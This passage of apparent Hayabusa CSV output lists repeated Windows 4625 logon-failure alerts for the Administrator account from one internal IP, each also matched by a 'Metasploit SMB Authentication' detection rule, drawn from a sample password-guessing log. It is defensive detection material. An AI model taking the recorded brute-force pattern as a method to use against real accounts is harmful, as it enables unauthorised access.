SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:06.328 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: I6mBM2WMWlKkQHZl : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:06.328 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:06.372 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 3jo7coI8uS8JCorc : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:06.372 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:06.406 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 1ao6QcPI3nzpNnHi : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:06.406 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:06.444 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong 
Password,User: Administrator : Type: 3 : Workstation: WkP8vstCEOH9wnUW : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:06.444 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:06.484 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: QzrhcYEue85zhZ8V : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:06.484 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:06.531 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: ivpdjGaxoZOCTxbq : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:06.531 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:06.572 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: qIsZXHE4Swkbytiu : IP Address: 192.168.198.149 : AuthPackage: 
NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:06.572 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:06.604 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: bdT2bVjtEd6KhQWf : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:06.604 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:06.652 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: RT9Tqp0lf0dd6h9C : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:06.652 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:06.696 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: Xwhlrl2ck1o2qTDy : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:06.696 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit 
SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:06.736 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: lxX2762Fa804981t : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:06.736 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:06.776 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: O55rRqTo9vgwnYoq : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:06.776 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:06.828 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: zo7BzxXZDdykOXoZ : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:06.828 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:06.868 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong 
Password,User: Administrator : Type: 3 : Workstation: 6YGEMcvYtwNJys39 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:06.868 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:06.908 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: V0xq8et2LwWSgVgk : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:06.908 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:06.956 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 43EK0cGlZBhWRd5B : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:06.956 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:06.996 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: UBoGMdTjWVVVvifn : IP Address: 192.168.198.149 : AuthPackage: 
NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:06.996 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:07.038 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: IcCrPXp3VLObGU6v : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:07.038 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:07.080 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: zhZguuPimqAruiTu : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:07.080 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:07.110 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 5o6amdSWFFbueCyp : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:07.110 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit 
SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:07.152 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: W0wRaNXdhMlIY1HX : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:07.152 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:07.192 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: J8jqrrwWeKZGypW0 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:07.192 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:07.236 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 8LIavw2zakOP4DqU : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:07.236 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:07.275 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong 
Password,User: Administrator : Type: 3 : Workstation: qz7gr4vA633waQ01 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:07.275 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:07.325 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 2TmHz5POLSNJHm2x : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:07.325 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:07.364 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: DcpOxhy2nnLIEGHT : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:07.364 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:07.453 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: gJxfDgfujy5Um2wa : IP Address: 192.168.198.149 : AuthPackage: 
NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:07.453 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:07.484 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 217VTq8EbYIDeSXU : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:07.484 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:07.524 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: WPfE1m0tsJAJnRt9 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:07.524 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:07.564 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: OQCfGhvBMSq3PIoa : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:07.564 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit 
SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:07.608 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: XBl6JIRetWEnjaVx : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:07.608 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:07.650 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: KXJMNnj4LeBIYARt : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:07.650 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:07.680 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: v3sdn9f4xtvcsaHp : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:07.680 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:07.720 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong 
Password,User: Administrator : Type: 3 : Workstation: DWT0NepMYD29cOwh : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:07.720 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:07.764 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: DDb7wV6uzj1tat2d : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:07.764 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:07.806 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: RBcmANUL4a6DFobS : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:07.806 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:07.841 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: VL2swHF9MtnCfnp3 : IP Address: 192.168.198.149 : AuthPackage: 
NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:07.841 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:07.883 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: E0ZkcAD0IakqSUph : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:07.883 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:07.924 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 5HgksdIGukmliZeE : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:07.924 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:07.966 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: xYoLckmmOWCSf4Q2 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:07.966 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit 
SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:08.000 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 2PTxr8Zkz2y2XwBo : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:08.000 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:08.044 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: J3caypkIM2XqoSSF : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:08.044 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:08.088 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: yuQOUzJ6sU5AhARR : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:08.088 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:08.128 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong 
Password,User: Administrator : Type: 3 : Workstation: SyM3OrjUHub9k23k : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:08.128 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:08.171 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: vY7SRoWumGQOrljW : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:08.171 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:08.212 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: iFrO2nUMlfeDLGyc : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:08.212 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:08.250 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 9B8Gq7d30U8DqdN0 : IP Address: 192.168.198.149 : AuthPackage: 
